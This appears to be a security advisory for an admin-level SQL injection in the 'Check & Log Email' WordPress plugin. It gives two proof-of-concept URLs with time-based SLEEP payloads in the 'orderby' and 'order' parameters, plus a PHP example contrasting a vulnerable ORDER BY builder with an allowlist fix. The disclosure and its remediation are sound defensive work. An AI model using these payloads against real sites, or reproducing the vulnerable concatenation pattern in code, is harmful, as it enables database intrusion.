wpexploit - Anton Sarsadskikh - WPEX-ID: F80EF09A-D3E2-4D62-8532-F0EBE59AE110
Published: Sep 27, 2021 - 12:00 a.m.

Check & Log Email < 1.0.3 - Admin+ SQL Injections

Tags: email security, log settings, sql injection, plugin vulnerability, admin panel

EPSS: 0.001 (percentile 37.2%)

The plugin does not validate or escape the "order" and "orderby" GET parameters before using them in a SQL statement when viewing logs, leading to SQL injection issues.

With the plugin's 'Enable Log' setting activated:
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)&order=DESC
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date&order=+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)
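The root cause described above is a sort clause built from request parameters. The following is an added example, not the plugin's own code, showing the vulnerable pattern beside a hardened one. `ORDER BY` identifiers and the sort direction cannot be bound as `$wpdb->prepare()` placeholders, so the fix is a strict allowlist of column names and directions; the column names (`sent_date`, `to_email`, `subject`) and the table name in the comment are assumptions, since the plugin's schema is not on this page.

```php
<?php
// Added example (not the plugin's own code): building an ORDER BY clause from
// user-supplied "orderby"/"order" parameters.
//
// Vulnerable pattern: request values are concatenated straight into SQL, so
// anything that is not a plain column name is executed by MySQL. This is the
// defect the advisory describes.
function build_order_clause_vulnerable(array $get): string {
    $orderby = $get['orderby'] ?? 'sent_date';
    $order   = $get['order'] ?? 'DESC';
    return "ORDER BY {$orderby} {$order}";
}

// Hardened pattern: strict allowlists. Column names are assumed for this example.
const ALLOWED_ORDERBY = ['sent_date', 'to_email', 'subject'];
const ALLOWED_ORDER   = ['ASC', 'DESC'];

function build_order_clause_hardened(array $get): string {
    $orderby = strtolower((string) ($get['orderby'] ?? 'sent_date'));
    $order   = strtoupper((string) ($get['order'] ?? 'DESC'));

    if (!in_array($orderby, ALLOWED_ORDERBY, true)) {
        $orderby = 'sent_date';   // unknown column: fall back, never interpolate the input
    }
    if (!in_array($order, ALLOWED_ORDER, true)) {
        $order = 'DESC';
    }
    // Both values now come from the allowlist, so interpolation is safe.
    return "ORDER BY `{$orderby}` {$order}";
}

// Inside a WordPress plugin the clause is appended to the query while the
// numeric paging values still go through $wpdb->prepare(); hypothetical table name:
//   $sql = $wpdb->prepare(
//       "SELECT * FROM {$wpdb->prefix}check_email_log "
//       . build_order_clause_hardened($_GET) . " LIMIT %d OFFSET %d",
//       $per_page, $offset);
//   $rows = $wpdb->get_results($sql);

// Stand-alone demonstration with constructed inputs. The second input is the
// decoded "orderby" value from the advisory's first PoC URL ('+' decodes to a space).
$inputs = [
    ['orderby' => 'sent_date', 'order' => 'ASC'],
    ['orderby' => 'sent_date AND (SELECT 4702 FROM (SELECT(SLEEP(5)))xwDN)', 'order' => 'DESC'],
    ['orderby' => 'subject', 'order' => 'drop'],
];
foreach ($inputs as $get) {
    echo "input     : " . json_encode($get), PHP_EOL;
    echo "vulnerable: " . build_order_clause_vulnerable($get), PHP_EOL;
    echo "hardened  : " . build_order_clause_hardened($get), PHP_EOL, PHP_EOL;
}
```

Run with `php example.php`: the vulnerable builder passes the injected clause through unchanged, while the hardened builder reduces every off-list value to the default `ORDER BY \`sent_date\` DESC`. WordPress also ships `sanitize_sql_orderby()`, which checks only that a value has the shape of an `ORDER BY` expression; it does not replace an explicit allowlist of the columns the screen is actually meant to sort by.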

